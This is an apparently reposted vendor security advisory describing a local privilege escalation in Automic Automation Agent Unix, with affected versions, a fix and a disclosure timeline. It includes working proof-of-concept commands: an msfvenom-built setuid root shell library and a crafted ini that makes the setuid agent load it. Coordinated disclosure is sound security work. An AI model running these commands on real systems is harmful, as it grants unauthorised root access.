Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Automic Automation Agent Unix Privilege Escalation

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 104
secuvera-SA-2025-01: Privilege Escalation

Affected Products
Automic Automation Agent Unix secuvera-SA-2025-01: Privilege Escalation

Affected Products
Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1

References
secuvera-SA-2025-01
CVE not assigned yet
CWE-426: Untrusted Search Path
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary:
An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying an ini file with the "authentication" option set to "PAM" and the "libName" option set to a shared object file controlled by the attacker.
The shared object will be loaded in an elevated context and can be used to execute arbitrary code as root.

Effect:
The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the vulnerable application.

Examples:
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")


Solution:
Update to version 24.3.0 HF4, 21.0.13 HF1 or higher

Disclosure Timeline:
2025/01/20 vulnerability discovered
2025/01/21 vendor contacted
2025/01/21 vendor acknowledged receipt
2025/02/04 requested status update
2025/02/04 provided clarification about the issue
2025/02/11 requested status update
2025/02/26 vendor confirmed vulnerability
2025/03/06 requested status update
2025/03/17 vendor provided fix and requested review
2025/04/03 vendor retracted request for review
2025/04/10 proposed date for public disclosure, vendor requested delay
2025/04/16 coordinated on cvss score and recommended fix
2025/04/28 requested status update
2025/05/02 vendor supplied tentative date for public disclosure
2025/05/08 requested status update
2025/05/12 public disclosure

Credits:
Flora Schaefer
This email address is being protected from spambots. You need JavaScript enabled to view it.
secuvera GmbH
https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.

Mit freundlichen Gr??en

Flo Sch?fer

Meine Pronomen sind sie*er/ihr*ihm. Ich freue mich ?ber eine genderneutrale Anrede.

+49 7032/9758-29
--
#Neues von secuvera.de
- Vortrag auf der CSK-Summit 2025: https://www.secuvera.de/aktuelles/vortrag-auf-der-csk-summit-2025/
- 1.Platz bei GPTW: Bester Arbeitgeber in BW 2025: https://www.secuvera.de/aktuelles/1-platz-bei-gptw-bester-arbeitgeber-in-bw-2025/
- Jahresmeeting 2025 #insideVera: https://www.secuvera.de/aktuelles/jahresmeeting-2025-insidevera/


#Bleiben Sie informiert auf LinkedIn
https://www.linkedin.com/company/secuvera-gmbh
#Rechtliche Informationen
secuvera GmbH
Siedlerstra?e 22-24
71126 G?ufelden/Stuttgart
www.secuvera.de

Registergericht: Amtsgericht Stuttgart HRB 241704
Gesch?ftsf?hrer: Tobias Glemser, Reto Lorenz